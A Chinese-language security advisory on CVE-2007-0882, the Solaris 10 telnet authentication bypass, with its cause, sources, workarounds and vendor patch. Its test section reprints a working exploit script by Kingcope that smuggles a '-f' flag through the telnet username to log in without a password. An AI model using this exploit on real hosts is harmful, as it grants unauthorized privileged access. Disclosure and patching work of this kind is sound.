安全研究

安全漏洞
Sun Solaris Telnet服务远程绕过认证漏洞

发布日期:2007-02-12
更新日期:2007-03-01

受影响系统:
Sun Solaris 10_x86
Sun Solaris 10.0
描述:
BUGTRAQ  ID: 22512
CVE ID: CVE-2007-0882

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。

Solaris 10的TELNET服务在处理畸形的认证数据时存在漏洞,远程攻击者可能利用此漏洞绕过认证获得访问。

Solaris 10的Telnet守护进程未经检查将用户可能提交的畸形参数直接传递给login进程处理,login进程由此执行非预期的用户身份切换操作。这可能允许用户无需口令便可以某些特权用户权限登录到系统,获得完全的系统访问,如果系统未能对root用户登录位置作限制,获取root用户访问也是可能的。目前这个漏洞正在被积极的利用。

<*来源:Gadi Evron (ge@linuxbox.org
        chris (chris@cr-secure.net
        Thomas
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=117132229623114&w=2
        http://riosec.com/solaris-telnet-0-day.html?q=solaris-telnet-0-day
        http://isc.sans.org/diary.html?storyid=2220
        http://www.kb.cert.org/vuls/id/881872
        http://www.us-cert.gov/cas/techalerts/TA07-059A.html
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

建议:
临时解决方法:

* 使用svcadm disable telnet命令禁用telnet;
* 如果必须运行telnet的话,使用防火墙限制可连接到telnet服务的IP。

厂商补丁:

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-102802)以及相应补丁:
Sun-Alert-102802:Security Vulnerability in the in.telnetd(1M) Daemon May Allow Unauthorized Remote Users to Gain Access to a Solaris Host
链接:http://download.oracle.com/sunalerts/1001064.1.html

浏览次数:4281
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障